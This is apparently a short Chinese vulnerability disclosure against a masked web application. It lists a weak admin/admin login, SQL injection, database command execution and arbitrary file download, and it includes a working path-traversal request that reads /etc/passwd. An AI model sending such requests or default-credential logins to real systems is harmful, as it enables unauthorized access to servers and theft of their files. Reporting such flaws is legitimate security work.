1.1. 应用系统弱口令
http://**.**.**.**:8080/ admin admin
看到的信息还不少啊。。。。0.0
1.2. 应用程序sa 注入
1.3. 数据库系统命令执行
---
1.4. 应用程序任意文件下载
**.**.**.**:8080//fileFetcherServlet?downloadName=%D6%DC%C1%FA%BA%A3%BD%E1%BB%E9%D6%A4.jpg&filePath=../../../../../../../../../../etc/passwd